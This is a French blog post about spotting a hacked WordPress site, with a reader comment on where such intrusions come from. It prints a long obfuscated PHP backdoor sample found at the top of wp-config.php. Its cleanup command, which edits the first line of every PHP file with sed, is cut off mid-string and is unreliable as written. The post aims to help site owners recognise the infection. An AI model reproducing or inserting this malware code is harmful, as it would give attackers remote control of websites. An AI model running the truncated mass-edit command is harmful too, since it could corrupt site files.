Développement

Comment savoir si wordpress est hacké

Par Guillaume , le 23 septembre 2015 , mis à jour le 2 décembre 2015 — 1 commentaire — hack, réparer, wordpress — 1 minute de lecture

Bonjour à tous,
Si comme moi, vous avez déjà eu quelques hacks sur wordpress et que vous voulez vous en débarrasser. VOici une petite astuce.

Pour commencer connectez vous en FTP et éditez le fichier wp-config.php (par exemple).
Si celui ci contient dès les premières lignes quelque chose du genre:

<?php if(!isset($GLOBALS["x61156x75156x61"])) { $ua=strtolower($_SERVER["x48124x54120x5f125x53105x52137x41107x45116x54"]); if ((! strstr($ua,"x6d163x69145")) and (! strstr($ua,"x72166x3a61x31"))) $GLOBALS["x61156x75156x61"]=1; } ?><?php $mtqvzubsmd = \'!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bddovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#j]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]2825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-8W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985:5298u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fuzbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#24<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%2f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x782sut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x78%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c#-%x5c%x7825o:W%x5c%x7825c:>1<7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x7825%x5c%x7824-%x5c%x782x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOx5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5cM4P8]37]278]225]241]334]368]322]3]364]6]283]427825)}.;%x5c%x7860UQPMSVDc%x7825}&;ftmbg}%x5c%x787f;!osvufs}w25-#1]#-bubE{h%x5c%x7825)tpqsut>825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64ye]53Ld]53]Kc]55Ld]55#*<%x5c%x7mjgA%x5c%x7827doj%x5c%x78256-*f%x5c%x7825)sf%x5c%x7878pmpusutx7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;e%x5c%x78b%x5c%x7825825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%xc%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Db%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]2t0}Z;0]=]0#)2q%x5c%x7825l}S;2-5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%rror_reporting(0); preg_replace("%x2c%x7825V<#65,47R25,d7R17,67R37,#%x5c%bubE{h%x5c%x7825)sutcvt-#w#)ldbjs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x78c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5x5c%x7827{ftmfV%x5c%f#<%x5c%x7825tdz>#L4]27c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#)sfebfI{*w%x5c%x7825)kV%c%x7825V<*#fopoV;hojepdoF.uofuopDf#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7787f;!|!}{;)gj}l;33bq}k;opjux787f<*X&Z&S{ftmfV%x5c%x787f<*XAZAS5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x78259]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#])fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]2x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQe%x786057ftbc%x5c%x787f!|!*uyf860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5cV<*w%x5c%x7825)ppde>u%x5g+)!gj+{e%x5c%x7825!osvufs!*!+A!>!1]y43]78]y33]65]y31]55]y85]82]y76]6B%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x78625w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEtpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%xy84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x7825;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)vt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bqov>*ofmy%x5c%x7825)utjm!|!*tutjyf%x5c%x7860opjudovg825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%%x5c%x7825-#1GO%x5c%x782ubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x78x61"]=1; function fjfgg($n){return chr(ord($n)-1);} @e9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39?]_%x5c%x785c}X%x5c%x78x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7x5c%x78256<C>^#zsfvr#%xhA%x5c%x7827pd%x5c%xftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpq155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%25s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x782]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85npd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-824-%x5c%x7824!>!tus%x5!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%5+*!*+fepdfe{h+{d%x5c%x7825)+opjudovdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x51%x72%164") && (!issw*[!%x5c%x7825rN}#QwTW%x5cf#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qpc%x785c%x5c%x7825j^%x5c%x78247825%x5c%x7824-%x5c%x799386c6f+9f5d816:+946:ce44#0QUUI&c_UOFHB%x5c%x7860SF7>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)ho}#-#%x5c%x7824-%x5c%x73]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x7825ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x782<%x5c%x787fw6*%x5c%x72]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); }%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y765-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6c%x7825%x5c%x7827jsv%]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x587f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x825kj:-!OVMM*<(<%x5c%x78e%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x525j:,,Bjg!)%x5c%x78255L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]K5:osvufs:~:<*9-1-r%x5c%x7825)s%x5cx7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y3%x5c%x7825)54l}%x5c%x7827;%x5c%j{fpg)%x5c%x7825s:*<%x5c%x785c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5csfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x787r.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+pm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}FNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78r#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y3of>2bd%x5c%x7825!<5h%x5x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f75c%x78257-C)fepmqnjA%x5c%x7827&6<.fopo#>b%x5c%x7825!*##>>X)!gjZ<824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x785c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutch%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tj%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x785c%x787f;!opjudovg}k~~7824-tusqpt)%x5c%x7825z-#:#*%x5c%x75c%x785cq%x5c%x78257**^#zsfvet($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%156%x75%156%4!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=t#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%xif((function_exists("%x6f%142%x5f%163%x74%14TV%x5c%x7860QUUI&b%x5c%x7825!|]y3e]81#%x5c%x782f#7e:55946-t]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**19x5c%x7825tdz)%x5c%x7825bbT-%x78256<C%x5c%x7827pd%x5c%x78256|6TQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bc%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985825<#g6R85,67R37,18R#>q%x5K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x%x7825eN+#Qi%x5c%x785c1^W%x5c%825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x78x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827EzH,2W%x5c%x7825wN;#-Ez-1H*WCx5c%x7824-%x5c%x7824*<!%x5c%x5tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x782x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#x5c%x7825nfd)##Qtpz)#]341]88%166%x61%154%x28%151%x6d%160%x6c%157%x64]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s#B#-#T#-#E#-#G#-#H#-#I#-#K#-0ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c25}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%xhnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x2#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1f%50%x2e%52%x29%57%x65","%x65u%x5c%x7825!-#2#%x5c%x782f#%x5c%#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x78612)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7c%x7825)fnbozcYufhA%x5c%x78272qj%*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{h%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47)1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%mw)%x5c%x7825tww**WYsboepn)%x%x7860{66~6<&w6<%x5c%x78%x5c%x7825b:>%x5c%x787]36]373P6]36]73]83]238M7x7822)!gj}1~!<2p%x5c%x7825%x#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x57fw6*CW&)7gj6<*doj%x-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#%145%x28%141%x72%162%x61%171%x5f%c%x7824]y8%x5c%x78245c%x7825bss-%x5c%x7825r%x5c%x7878B%x57-2qj%x5c%x78257-K)udfoopx5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x78c%x7825)n%x5c%x7825-#+I#!-id%x5c%x7825)uqpuft%x5c%x7860msvd},c%x787f_*#ujojRk3%x5c%34]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe)>5h%x5c%x7825!<*::::::-1111{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f/(.*)/epreg_replacelmuciwreta\'; $zlcmiavdjg = explode(chr((227-183)),\'7717,44,5241,20,7443,69,4222,54,2030,36,8943,29,8487,40,9676,33,4563,66,808,49,5762,63,4156,66,3239,36,499,60,621,36,3275,52,4434,20,7964,32,857,56,2496,63,8264,40,329,63,2134,48,657,51,7872,63,9766,25,5134,54,3705,70,5435,50,6822,45,9207,33,7045,52,9553,36,5869,21,4411,23,7415,28,6974,47,9004,58,8606,61,9455,24,9589,20,7097,35,1541,28,5625,21,5944,36,6291,63,3387,65,6934,40,6071,57,9920,22,1803,46,1602,63,6867,67,8118,48,1350,25,9883,37,5188,53,1375,36,3775,60,3925,24,9114,42,4454,66,3327,60,4520,43,708,62,1411,32,7321,37,142,67,2103,31,3897,28,7676,41,7220,41,3835,62,4037,70,8723,35,9525,28,2685,70,0,35,4013,24,8794,58,7021,24,2271,59,2451,45,9298,45,2797,51,10009,27,9062,52,6589,53,5695,67,392,66,1569,33,6758,64,5383,27,3513,60,3203,36,5410,25,7761,30,4973,53,7132,29,7626,50,1236,68,2971,29,3452,61,3000,46,5287,45,6461,31,8758,36,7358,22,4276,45,9240,58,4780,47,5561,64,5098,36,3134,34,10036,70,5054,44,2228,20,2650,35,3110,24,2066,37,4344,67,8092,26,2418,33,2393,25,9791,68,8667,56,2622,28,35,53,1938,30,8972,32,6242,49,4321,23,458,41,6415,46,2755,42,3643,62,4719,61,7820,52,8362,44,6208,34,9343,42,1085,55,9859,24,9156,51,1443,68,8527,51,770,38,8196,68,4107,49,8406,53,5890,54,1735,68,2182,46,5332,29,9609,67,5485,21,7380,35,4950,23,559,62,9709,20,4629,37,1016,69,8333,29,5980,58,5361,22,7161,59,994,22,7512,65,4827,55,3046,64,8166,30,2917,54,7996,49,6642,51,209,65,8304,29,5261,26,1178,58,7261,60,9426,29,9729,37,8045,47,274,55,5825,44,7791,29,6693,65,3573,70,1849,49,2248,23,6149,59,1511,30,3949,64,7935,29,1968,62,8459,28,1304,46,9500,25,2848,69,9942,67,9385,41,2330,63,913,30,7577,49,6492,28,6128,21,5026,28,9479,21,4666,53,6520,69,8893,50,1140,38,8852,41,1685,50,943,51,1665,20,4882,68,8578,28,2559,63,6038,33,1898,40,5506,55,6354,61,88,54,3168,35,5646,49\'); $spbumcxyfi=substr($mtqvzubsmd,(63915-53809),(21-14)); if (!function_exists(\'mwrhcidctz\')) { function mwrhcidctz($zebzhykwih, $hgkaxslrtf) { $tlbmjrizuh = NULL; for($gnyaudjggn=0;$gnyaudjggn<(sizeof($zebzhykwih)/2);$gnyaudjggn++) { $tlbmjrizuh .= substr($hgkaxslrtf, $zebzhykwih[($gnyaudjggn*2)],$zebzhykwih[($gnyaudjggn*2)+1]); } return $tlbmjrizuh; };} $cavsztcqlk="x2057x2a40x69155x69146x74171x75150x76170x2052x2f40x65166x61154x28163x74162x5f162x65160x6c141x63145x28143x68162x2850x3161x3655x3771x2951x2c40x63150x7250x2863x3960x2d62x3970x2951x2c40x6d167x72150x63151x64143x74172x2844x7a154x63155x69141x76144x6a147x2c44x6d164x71166x7a165x62163x6d144x2951x2973x2057x2a40x74171x77151x6b144x63170x63145x2052x2f40"; $rrfzgzfeho=substr($mtqvzubsmd,(54238-44125),(73-61)); $rrfzgzfeho($spbumcxyfi, $cavsztcqlk, NULL); $rrfzgzfeho=$cavsztcqlk; $rrfzgzfeho=(426-305); $mtqvzubsmd=$rrfzgzfeho-1; ?>
Hack wordpress

vous l\’aurez deviné, votre wordpress est infecté.

Comment faire pour réparer ce problème ?

Et bien j\’ai une petite astuce qui consiste à se connecter en SSH, puis de se rendre à la racine de son site et lancer la commande:

find . -name "*.php" -exec sed -i \'1 s/.*/ 

Laissez mouliner un peu et une fois l\’opération terminée, rééditez votre wp-config.php et votre problème devrait être réglé.

Cela dit, je ne sais pas encore d\’ou provient le hack, n\’hésitez pas à commenter si vous avez plus d\’informations à propos de celui-ci.
Enjoy 😉

Guillaume

Commentaires

Le 23 septembre 2015 à 13 01 42 09429, Alan a dit :


En général ce genre d'insertion se fait à partir des failles plugin ou plus grave : Wordpress lui même pour trouver son origine : il faut checker les tentatives d'attaques sur les serveur :
go "access.log" et essayes de repérer des connexion du même ip vers plein de dossiers et plugin que tu n'as pas forcément.

Ces attaques tentent de repérer les failles d'upload ou des droits d'utilisateurs un peu "libertins". La meilleur défense que j'ai trouvé c'est de mettre des htaccess un peu partout (dossier upload, config...) et bien sur limiter au maximum les chmod)


Votre réponse sera révisée par les administrateurs si besoin.

Laisser un commentaire

Votre commentaire sera révisé par les administrateurs si besoin.